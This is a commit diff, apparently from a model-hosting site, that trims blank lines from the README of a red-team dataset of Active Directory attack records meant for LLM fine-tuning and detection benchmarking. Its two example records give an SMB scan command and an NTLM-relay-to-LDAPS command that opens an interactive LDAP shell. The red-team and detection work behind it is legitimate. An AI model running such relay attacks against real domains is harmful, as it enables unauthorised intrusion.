Update README.md
Browse files
README.md
CHANGED
|
@@ -1,21 +1,16 @@
|
|
| 1 |
# Redteam-Operations-Datasets
|
| 2 |
-
|
| 3 |
A comprehensive dataset for training, benchmarking, and documenting offensive/red-team operations in Active Directory and hybrid environments.
|
| 4 |
|
| 5 |
## Structure
|
| 6 |
-
|
| 7 |
- `datasets/` — All dataset files, organized by attack phase, tactic, and technique.
|
| 8 |
- `datasets/schema/record.schema.json` — Canonical schema for dataset records.
|
| 9 |
- `datasets/*.jsonl` — Task-specific datasets, each line is a JSON object.
|
| 10 |
|
| 11 |
-
|
| 12 |
## Usage
|
| 13 |
-
|
| 14 |
- For fine-tuning LLMs, benchmarking detection, or creating mindmaps/playbooks.
|
| 15 |
- Each file is a JSONL (one record per line), see the example schema below.
|
| 16 |
|
| 17 |
## Example Record
|
| 18 |
-
|
| 19 |
```json
|
| 20 |
{"instruction": "Scan Network", "input": "nxc smb <ip_range>", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."}
|
| 21 |
{"instruction": "NTLM relay > To LDAP(S)", "input": "ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."}
|
|
|
|
| 1 |
# Redteam-Operations-Datasets
|
|
|
|
| 2 |
A comprehensive dataset for training, benchmarking, and documenting offensive/red-team operations in Active Directory and hybrid environments.
|
| 3 |
|
| 4 |
## Structure
|
|
|
|
| 5 |
- `datasets/` — All dataset files, organized by attack phase, tactic, and technique.
|
| 6 |
- `datasets/schema/record.schema.json` — Canonical schema for dataset records.
|
| 7 |
- `datasets/*.jsonl` — Task-specific datasets, each line is a JSON object.
|
| 8 |
|
|
|
|
| 9 |
## Usage
|
|
|
|
| 10 |
- For fine-tuning LLMs, benchmarking detection, or creating mindmaps/playbooks.
|
| 11 |
- Each file is a JSONL (one record per line), see the example schema below.
|
| 12 |
|
| 13 |
## Example Record
|
|
|
|
| 14 |
```json
|
| 15 |
{"instruction": "Scan Network", "input": "nxc smb <ip_range>", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."}
|
| 16 |
{"instruction": "NTLM relay > To LDAP(S)", "input": "ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."}
|